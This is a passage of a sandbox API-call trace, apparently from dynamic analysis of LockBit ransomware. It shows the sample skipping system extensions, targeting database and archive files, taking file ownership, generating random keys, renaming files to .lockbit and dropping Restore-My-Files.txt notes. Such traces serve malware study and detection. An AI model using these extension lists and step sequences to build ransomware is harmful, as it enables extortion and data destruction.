(lpString1=".tmd", lpString2=".png") returned 1 [0096.209] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png.lockbit") returned 92 [0096.209] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.210] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0096.211] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0096.212] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.213] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0096.214] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0096.214] RtlFreeAnsiString (AnsiString="\\") [0096.214] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x330) returned 0x0 [0096.214] malloc (_Size=0x200) returned 0x77d800 [0096.214] NtQueryInformationToken (in: TokenHandle=0x330, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0096.214] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.214] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.214] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.215] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.215] CloseHandle (hObject=0x330) returned 1 [0096.216] free (_Block=0x77d800) [0096.216] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0096.216] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0096.216] malloc (_Size=0x40068) returned 0x3db00b8 [0096.219] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=4955) returned 1 [0096.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.221] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0096.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0096.224] ReadFile (in: hFile=0x330, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0096.229] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0096.229] malloc (_Size=0xce) returned 0x77d800 [0096.230] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0096.230] free (_Block=0x77d800) [0096.230] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0096.231] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0096.231] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.231] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0096.231] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0096.231] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0096.231] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0096.231] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0096.231] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0096.231] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0096.232] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0096.232] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.232] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0096.232] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0096.233] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0096.233] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0096.233] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0096.233] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0096.233] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0096.233] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0096.233] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0096.234] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0096.234] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0096.234] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0096.234] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0096.234] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0096.234] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0096.234] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0096.234] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0096.234] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0096.234] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png") returned=".png" [0096.234] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0096.234] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0096.234] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0096.234] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0096.234] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0096.234] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0096.234] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0096.234] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0096.235] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0096.235] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0096.235] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0096.235] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0096.235] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0096.235] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0096.236] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0096.236] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0096.236] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png.lockbit") returned 98 [0096.236] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.238] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0096.240] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0096.240] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.241] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0096.243] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0096.243] RtlFreeAnsiString (AnsiString="\\") [0096.244] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13e4) returned 0x0 [0096.244] malloc (_Size=0x200) returned 0x77d800 [0096.244] NtQueryInformationToken (in: TokenHandle=0x13e4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0096.244] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.244] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.244] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.245] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.246] CloseHandle (hObject=0x13e4) returned 1 [0096.246] free (_Block=0x77d800) [0096.246] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0096.246] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0096.246] malloc (_Size=0x40068) returned 0x3df0128 [0096.249] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=3081) returned 1 [0096.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0096.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0096.256] ReadFile (in: hFile=0x13e4, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0097.216] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.216] malloc (_Size=0xda) returned 0x77d800 [0097.216] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xda, FileInformationClass=0xa) returned 0xc0000008 [0097.216] free (_Block=0x77d800) [0097.216] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0097.216] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0097.216] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.217] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="softedges.png", cAlternateFileName="")) returned 1 [0097.217] lstrcmpiW (lpString1=".", lpString2="softedges.png") returned -1 [0097.217] lstrcmpiW (lpString1="..", lpString2="softedges.png") returned -1 [0097.217] PathFindExtensionW (pszPath="softedges.png") returned=".png" [0097.217] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0097.217] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0097.217] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0097.218] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0097.218] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="softedges.png") returned -1 [0097.219] lstrcmpiW (lpString1="ntldr", lpString2="softedges.png") returned -1 [0097.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="softedges.png") returned -1 [0097.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="softedges.png") returned -1 [0097.219] lstrcmpiW (lpString1="autorun.inf", lpString2="softedges.png") returned -1 [0097.219] lstrcmpiW (lpString1="thumbs.db", lpString2="softedges.png") returned 1 [0097.219] lstrcmpiW (lpString1="iconcache.db", lpString2="softedges.png") returned -1 [0097.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0097.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png") returned=".png" [0097.219] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0097.219] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0097.219] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0097.219] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0097.220] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0097.220] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0097.220] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0097.220] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0097.220] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0097.220] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0097.220] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png.lockbit") returned 75 [0097.220] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.222] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.224] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.224] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.225] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.226] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.229] RtlFreeAnsiString (AnsiString="\\") [0097.229] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13e4) returned 0x0 [0097.229] malloc (_Size=0x200) returned 0x77d800 [0097.229] NtQueryInformationToken (in: TokenHandle=0x13e4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0097.229] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0097.229] 